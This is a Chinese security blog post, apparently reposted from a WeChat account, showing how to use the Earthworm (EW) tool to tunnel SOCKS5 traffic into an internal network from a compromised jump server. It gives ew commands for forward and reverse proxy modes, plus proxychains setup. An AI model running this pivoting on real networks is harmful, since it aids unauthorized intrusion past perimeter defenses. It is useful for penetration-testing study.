Earthworm (EW) 做Socks5正向和反向代理穿透内网

admin 2022年4月23日08:58:25安全文章评论11 views572字阅读1分54秒阅读模式

Earthworm (EW) 做Socks5正向和反向代理穿透内网


一、Earthworm (EW)简介


EW是一套便捷的网络穿透工具


工具支持多个平台,穿透模式分为正向代理和反向代理


该工具已经停止更新了,并且杀软都会报毒


二、EW使用


网络拓扑图

Earthworm (EW) 做Socks5正向和反向代理穿透内网

正向代理


假设拿下B服务器,将工具上传到B服务器上使用


跳板机执行命令


ew_for_Win.exe -s ssocksd -l 8888

Earthworm (EW) 做Socks5正向和反向代理穿透内网攻击机开立开启代理


vim /etc/proxychains.conf
//这里填写的IP是跳板机的IP地址和跳板机上设置的端口

Earthworm (EW) 做Socks5正向和反向代理穿透内网

成功访问内网机器的80端口


proxychains curl http://10.10.10.132:80

Earthworm (EW) 做Socks5正向和反向代理穿透内网

反向代理

先在B机器上执行命令

ew_for_Win.exe -s rcsocks -l 7766 -e 6677
//跳板机监听7766端口并把流量走6677端口

Earthworm (EW) 做Socks5正向和反向代理穿透内网

再在C机器上执行命令

ew_for_Win.exe -s rssocks -d 10.10.10.133 -e 6677
//内网机器连接10.10.10.133的6677端口

Earthworm (EW) 做Socks5正向和反向代理穿透内网

攻击机开启代理

vim /etc/proxychains.conf
//本地机器做代理,流量走跳板机的7766端口,就可以访问到C内网

Earthworm (EW) 做Socks5正向和反向代理穿透内网

成功访问

Earthworm (EW) 做Socks5正向和反向代理穿透内网

代理后的拓扑图Earthworm (EW) 做Socks5正向和反向代理穿透内网


原文始发于微信公众号(Nurburgring):Earthworm (EW) 做Socks5正向和反向代理穿透内网

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日08:58:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Earthworm (EW) 做Socks5正向和反向代理穿透内网 http://cn-sec.com/archives/872664.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: